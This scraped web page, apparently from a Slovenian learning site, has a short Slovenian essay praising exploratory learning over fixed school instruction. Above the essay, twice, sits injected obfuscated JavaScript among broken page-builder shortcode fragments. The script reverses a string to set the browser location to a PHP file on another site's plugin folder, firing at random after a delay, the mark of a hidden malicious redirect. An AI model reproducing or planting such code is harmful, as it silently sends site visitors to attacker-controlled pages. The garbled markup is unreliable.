Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” disabled=”off”]

Eksplorativno učenje


Tako kot poskušanje, je tudi raziskovanje primarni način učenja. Pravimo, da otroci raziskujejo svet okrog sebe, želimo pa povedati, da se učijo. In res je!

Raziskovanje nam omogoča, da pridobivamo znanje o tem, kar nas trenutno zanima. Da se učimo, kar in ko to potrebujemo. Za razliko od šole, v kateri prihaja znanje, ki ga je določil učitelj, takrat, ko je to določil učitelj, nam raziskovanje omogoča, da prilagodimo učenje otroku, njegovim interesom in počutju.

Eksplorativno učenje pomeni, da se otrok ukvarja s problemom, ki si ga je zastavil. Izhaja iz tega kar že zna in z raziskovanjem pridobiva vedno nove informacije. Na voljo ima dovolj časa, da se ukvarja s problemom na sebi lasten način. Za razliko od šole oz. učbenikov, v katerih zaradi ozke omejitve s časom prejema vnaprej določene informacije na vnaprej določen način.

Drugače kot sorodno izkustveno učenje, je raziskovanje ohranilo svoj pomen za napredek človeštva in se danes uvršča med najbolj ugledne poklice. Žal pa je zaradi tega postalo visoko specializirano in je v izobraževanju vse do univerze zelo zapostavljeno.

Pri Spreten.si je raziskovanje eden izmed temeljev učenja. Sledi interesom učencev, ki imajo tudi dovolj časa, da svoj problem raziščejo “v globino”, ne samo praskajo po površini mnogih predmetov, kot to počnejo v šoli.